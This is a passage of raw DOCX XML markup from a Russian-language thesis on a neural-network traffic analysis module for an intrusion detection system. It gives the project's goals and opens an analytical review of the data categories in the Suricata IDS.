      <w:r w:rsidRPr="00E45E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, для обнаружения которых целесообразно применение нейросетевых методов</w:t>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330EF5D3" w14:textId="4D100BE0" w:rsidR="008E0171" w:rsidRPr="00546173" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="28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8E0171" w:rsidRPr="00546173">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ровести сравнительный анализ </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00EB1A47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>существующих моделей и методов обнаружения атак</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF963D6" w14:textId="6CD399ED" w:rsidR="008E0171" w:rsidRPr="00E45E6A" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"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008E0171" w:rsidRPr="00E45E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>проектировать архитектуру модуля анализа трафика на основе искусственной нейронной сети для интеграции с СОВ</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D77EDD1" w14:textId="7FA4F983" w:rsidR="008E0171" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>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8E0171" w:rsidRPr="004972C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровести анализ и выбрать датасет для обучения и тестирования нейросетевой модели</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB6C66" w14:textId="1642FE5C" w:rsidR="008E0171" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>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8E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ыполнить </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="004972C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>предобработку и векторизацию</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> датасета</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA8076" w14:textId="55C5B2AC" w:rsidR="008E0171" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>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8E0171" w:rsidRPr="00E45E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">азработать и обучить нейросетевую модель для детектирования аномалий </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00E45E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сетевых атак</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F0F01" w14:textId="4FE2D40C" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>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8E0171" w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>еализовать прототип модуля анализа трафика, включающий обученную модель и механизм предобработки данных</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF4EA3" w14:textId="76FABFF5" w:rsidR="008E0171" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>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8E0171" w:rsidRPr="00642B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>азработать и реализовать механизм интеграции нейросетевой модели с выбранной СОВ</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4038A2AC" w14:textId="64EF9A81" w:rsidR="008E0171" w:rsidRPr="00E45E6A" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>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8E0171" w:rsidRPr="00E45E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>азработать модель разграничения прав доступа и безопасного управления для служебных функций прототипа модуля</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C58A0F" w14:textId="60D9499F" w:rsidR="008E0171" w:rsidRPr="0027780D" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00E45E6A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ровести </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="004972C4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>тестирование</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> плагина</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="004972C4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> на лабораторном стенде с имитацией атак</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сравнить его эффективность с классической СОВ</w:t>
      </w:r>
      <w:r w:rsidR="009D5D3A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E38AA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="-85"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E0BC14" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="-85"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9C41CD" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="-85"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68953CF2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="-85"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40500A33" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="-85"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A40AC9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-142" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053EAD12" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00692355" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-142" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50823C2B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4B130A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E26432B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEBAEF9" w14:textId="1A9445D0" w:rsidR="008E0171" w:rsidRPr="009D45A4" w:rsidRDefault="009D45A4" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc230947683"/>
      <w:bookmarkStart w:id="4" w:name="_Toc231673278"/>
      <w:r w:rsidRPr="009D45A4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="009D45A4">
        <w:t>Анал</w:t>
      </w:r>
      <w:r w:rsidR="00812517" w:rsidRPr="009D45A4">
        <w:t>итический обзор</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="25C70D02" w14:textId="14E532EB" w:rsidR="008E0171" w:rsidRDefault="00B94E2A" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc231673279"/>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="006605C1">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:t>Анализ структуры данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="604ABD8C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1429"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E568A10" w14:textId="61C688CE" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="008E0171" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Анализ архитектуры обработки данных в системе обнаружения вторжений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F310AD" w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F310AD" w:rsidRPr="00F310AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1]</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выявил три основные категории информации, циркулирующей в процессе </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мониторинга сетевого трафика</w:t>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB585C" w14:textId="2F9BDD25" w:rsidR="008E0171" w:rsidRPr="003D0142" w:rsidRDefault="005A1278" w:rsidP="000B2212">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>араметры</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> захвата и интерфейса — служебная информация, определяющая источник данных и условия сбора трафика. Включает MAC- и IP-адреса сетевых интерфейсов, тип подключения, режим работы захвата, фильтры Беркли и параметры буферизации</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79A560" w14:textId="7BA4FE53" w:rsidR="008E0171" w:rsidRPr="003D0142" w:rsidRDefault="005A1278" w:rsidP="000B2212">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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8E0171" w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>етевые пакеты и протоколы — структурированные данные сетевого взаимодействия, содержащие заголовки транспортного и сетевого уровней (размер пакета, протокол, порты источника и назначения, флаги), а также декодированную информацию прикладных протоколов</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA398D" w14:textId="0895670C" w:rsidR="008E0171" w:rsidRPr="003D0142" w:rsidRDefault="005A1278" w:rsidP="000B2212">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>етаданные трафика и результаты анализа —</w:t>
      </w:r>
      <w:r w:rsidR="0095287B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003D0142">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информация, формируемая в процессе работы системы</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, которые включают в себя:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EC2CB" w14:textId="0F4963BE" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="005A1278" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A50F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>етаданные потока (количество пакетов, интервалы между ними, общий объем трафика, временные метки начала и окончания сетевой сессии)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453C73A" w14:textId="247792F6" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="000B2212" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
